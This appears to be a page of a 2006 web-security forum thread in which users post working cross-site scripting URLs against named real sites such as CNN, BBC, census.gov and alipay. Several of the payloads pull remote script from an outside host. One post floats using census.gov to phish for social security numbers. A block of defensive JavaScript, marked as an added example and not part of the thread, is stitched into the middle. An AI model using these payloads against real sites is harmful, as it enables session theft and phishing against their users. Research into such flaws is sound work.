Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 6 of 65
Re: So it begins
Posted by: rsnake
Date: September 24, 2006 09:14PM

Kyran, it's now located at http://ha.ckers.org/s.js :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 24, 2006 09:15PM

Here is a good example of my post earlier regarding <style> tags disallowing the rest of the page to show.

http://www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E%3Cstyle%3E&submitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA


This is without the style tag.

http://www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&submitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA

But of course, if there is a closing style tag everything after it will still show.


Edit - Thanks for that rsnake! :D

- Kyran



Edited 1 time(s). Last edit at 09/24/2006 09:22PM by Kyran.

Re: So it begins
Posted by: rsnake
Date: September 24, 2006 10:22PM

http://www.cbs.com/excedrin/register.php?mpid=2691&success_page=thankyou.php&action=create&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&password2=&firstname=&lastname=&address1=&city=&state=&zip=&country=&birthdate=%2F%2F&birthmonth=&birthday=&birthyear=&phone=&email=&previous_email=&ireadtherules=&Submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 24, 2006 10:44PM

http://rzr.online.fr/docs/search/redir.php?url=a</title><script>alert(String.fromCharCode(88,83,83))</script>
http://www.nationalcrediteducationweek.com/redirect.aspx?redir=delayedXSS';alert('XSS');t%20=' <-- delayed XSS by 5 seconds.
http://www.nscp.org/cgi-bin/leave.pl?redir=google.com/<script>alert('XSS')</script> <-- XSS then redirect, although it can be overwritten if you want.
http://www.dmas.virginia.gov/pr-provider_no.asp?redir=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb

-maluc



Edited 3 time(s). Last edit at 09/25/2006 12:13AM by maluc.

Re: So it begins
Posted by: maluc
Date: September 24, 2006 11:52PM

http://www.innovations.va.gov/innovations/docs/notva.cfm?redir=');%7Dalert('XSS');if(1==0)%7B//

this is a rather interesting javascript injection: ');}alert('XSS');if(1==0){//

the function it's injected into looks like:

function openClose(){
  window.open('http://INPUTHERE','');
  window.close();
}

The '); breaks out of the window.open, and since this function is only called when pressing the "continue" button, the } breaks out of the function. Then any javascript can freely be added, but we need to clean up the remainder:

,'');
window.close();
}

The ,''); is commented out using the //, and the { matches the right-hand bracket. The script now works, but if we don't want it to close immediately (because of window.close), we can use an impossible condition to prevent it: the if(1==0){ }

it's nothing difficult, just funky looking

-maluc

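maluc's post above describes a value pasted straight into a JavaScript string literal, so that the input can close the literal and the enclosing function. As an added example (not code from the forum post or from the affected site), here is that vulnerable rendering beside a hardened one that emits the URL through a serializer, plus a small harness that shows the quoted payload breaks out of the first and stays inert in the second. The names jsStringLiteral, renderUnsafe, renderSafe and triggersBreakout are assumptions made for this example; the openClose text follows the post.

```javascript
// Added example (not from the forum post or the affected site): emitting a
// server-side value into a JavaScript string literal safely, versus raw
// concatenation. Function names are assumptions made for this example.

// Serialize a value as a JS string literal that cannot terminate the literal,
// the enclosing <script> element, or a line (U+2028/U+2029 are JS line
// terminators that JSON.stringify leaves unescaped).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')          // "</script>" inside the literal would end the element
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The vulnerable pattern: the redirect target is pasted into the source text,
// exactly the shape of the function quoted in the post.
function renderUnsafe(url) {
  return "function openClose(){\n" +
         "window.open('http://" + url + "','');\n" +
         "window.close();\n" +
         "}";
}

// The hardened pattern: same function, but the URL goes through jsStringLiteral.
function renderSafe(url) {
  return "function openClose(){\n" +
         "window.open(" + jsStringLiteral("http://" + url) + ",'');\n" +
         "window.close();\n" +
         "}";
}

// Harness: evaluate the rendered script with a stub window and a recording
// alert. openClose is never invoked, so if alert runs (or the script fails to
// parse) the input escaped the string literal.
function triggersBreakout(script) {
  let alerted = false;
  const fakeWindow = { open() {}, close() {} };
  try {
    new Function('window', 'alert', script)(fakeWindow, () => { alerted = true; });
  } catch (e) {
    return true;                      // syntax error: the literal was broken too
  }
  return alerted;
}

// Constructed input: the payload quoted in the post, URL-decoded.
const PAYLOAD = "');}alert('XSS');if(1==0){//";

console.log('unsafe rendering breaks out:', triggersBreakout(renderUnsafe(PAYLOAD))); // true
console.log('safe rendering breaks out:  ', triggersBreakout(renderSafe(PAYLOAD)));   // false
```

The serializer covers only the JavaScript string-literal context; a value that later lands in HTML, a URL or CSS still needs the encoding for that context, which is why the `</` escape is there even though the JSON layer alone would have kept the literal intact.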
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 12:01AM

Hah. That's quite neat.

- Kyran

Re: So it begins
Posted by: maluc
Date: September 25, 2006 01:47AM

http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3C/b
http://www.opic.gov/leaving.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b
https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_alp.php?p_sid=5tkbkvii&p_lva=&p_li=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&p_search_text=a%22%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E&p_new_search=1 <--the " gets translated to &quot; in IE only (tested on IE7 though).. works fine in Firefox

Someone less tired than I can do more testing to see where I'm screwing up. census.gov is a great excuse to ask people for their social security numbers, etc.

-maluc



Edited 2 time(s). Last edit at 09/25/2006 03:47AM by maluc.

Re: So it begins
Posted by: maluc
Date: September 25, 2006 01:55AM

http://columbiaredi.com/redirect.php?url='%20onmouseover=alert('XSS')%20style='-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)%27 mouseover the Continue link in IE .. auto in FF

-maluc

Re: So it begins
Posted by: maluc
Date: September 25, 2006 03:08AM

http://www.dotcr.ost.dot.gov/asp/redirect.asp?url=zomg%20XSS%3Cscript%3Ealert('XSS')%3C/script%3E <--need to overwrite meta to prevent redirect
http://www.mbda.gov/redirect.php?url='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b

-maluc



Edited 1 time(s). Last edit at 09/25/2006 03:23AM by maluc.

Re: So it begins
Posted by: dyn0
Date: September 25, 2006 10:19AM

http://www.friendsreunited.co.uk/FriendsReunited.asp?wci=forgotton&member_email=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E&error=Y

Re: So it begins
Posted by: dyn0
Date: September 25, 2006 10:19AM

http://www.salford.gov.uk/search.htm?col=justhtml&qt=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:45AM

We've been slashdotted! Sneaky bastards deep linking to .php files! http://it.slashdot.org/it/06/09/25/1440220.shtml Performance has degraded massively... Expect some outages today... sorry about that folks!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 12:19PM

The darkreading article has been syndicated on Doctor Dobb's journal as well: http://www.ddj.com/dept/security/193005254

Keep up the good work guys!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 12:49PM

Borrowed from Maluc's redirect list and turned into XSS: http://www.freeml.com/servlet/redir?rd=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 25, 2006 03:52PM

Nice! Slashdotted.

rsnake, that last one is mean. Even if scripts are disabled it auto-refreshes over and over.

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 03:57PM

That's easy to get rid of if you want, I just didn't bother as a POC. :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 25, 2006 04:13PM

I would assume using javascript to edit it? I can't see any html way to do so.

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 04:24PM

Yah, not using this example (since there is some logic built into it to stop this), but if you redirect to #whatever I don't think meta refresh will cause the whole thing to re-load, since whateverpageyouon.html#whatever causes the page to refresh. But you're right, I was talking about using document.write or a javascript: directive.

Re: So it begins
Posted by: kirke
Date: September 25, 2006 04:38PM

ddj.com and darkreading.com listed the companies, probably siteadvisor.com needs to change their "green" to "red" for those. Try yourself:

http://www.siteadvisor.com/lookup/?q='%20onmouseover=%22alert('want%20to%20add%20whatever%20you%20like')%22%3E

currently a bit annoying 'cause you have to use your mouse, but works anyway ;-)

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 04:48PM

*sigh* You have a very good point (funny XSS but very real issue). But how can they really analyze these types of sites without taking into account XSS based phishing attacks?

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: kirke
Date: September 25, 2006 05:01PM

.. if you manage to inject an iframe .. or loading into the DOM ..

Re: So it begins
Posted by: kirke
Date: September 25, 2006 05:03PM

ouch:

http://www.breach.com/news_press_detail.asp?id=42-0

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:03PM

Both are trivial if you have JavaScript on the page already. I wonder what tools they use to vet these websites... It seems like they are mostly worried about distribution of malware or spam, both of which could happen via XSS defacement/phishing.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:45PM

http://audience.cnn.com/services/cnn/memberservices/member_auth.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:51PM

http://www.bbc.co.uk/cgi-perl/signon/mainscript.pl?c=login&service=mbhealth&ptrt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:57PM

Big auction site in China: http://search1.taobao.com/browse/0/t-g,ei7dy43dojuxa5b6mfwgk4tufarfqu2teiutyl3tmnzgs4duhy----------------40-list-commend-0-all-0.htm

And their payment processor: https://www.alipay.com/user/user_register.htm?support=000000&_fmu.u._0.e=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_fmu.u._0.e=&_fmu.u._0.q=&_fmu.u._0.qu=&_fmu.u._0.pa=&_fmu.u._0.pay=&_fmu.u._0.p=%CE%D2%B0%D6%B0%D6%C2%E8%C2%E8%B5%C4%C3%FB%D7%D6%B8%F7%CA%C7%CA%B2%C3%B4&_fmu.u._0.o=&_fmu.u._0.pr=&_fmu.u._0.u=2&_fmu.u._0.f=&_fmu.u._0.r=&_fmu.u._0.ca=%C9%ED%B7%DD%D6%A4&_fmu.u._0.car=&_fmu.u._0.c=&_fmu.u._0.re=alipay&action=register_action&event_submit_do_register=anything&Submit=%CD%AC%D2%E2%D2%D4%CF%C2%CC%F5%BF%EE%A3%AC%B2%A2%C8%B7%C8%CF%D7%A2%B2%E1

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 25, 2006 06:18PM

http://www.clickbank.com/marketplace.html?method=Sort&s=&c=-1&subc=-1&keywords=%22%3E%3Cscript%3Ealert+%28%27xss%27%29%3C%2Fscript%3E&sortBy=popularity&i=10

- Kyran

Re: So it begins
Posted by: Acidus
Date: September 25, 2006 09:34PM

This is just silly. You search for XSS, you XSS them
http://www.altavista.com/web/results?&q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%22Ownage+by+Acidus%22%29%3C%2Fscript%3E

Acidus

--
Most Significant Bit Labs
http://www.msblabs.org

Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 10:06PM

http://search.netscape.com/ns/search?query=%27%29%3Balert%28%27xss&st=webresults&fromPage=NSCPResultsT

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Acidus
Date: September 25, 2006 10:08PM

Another CNN issue. Multiple reflections for a single attack string, so if you seriously exploit it you'll need to put in a variable flag.

http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?url=%22%3E%3Cscript%3Ealert(%220wnage%20by%20Acidus%22)%3C/script%3E

Acidus

--
Most Significant Bit Labs
http://www.msblabs.org
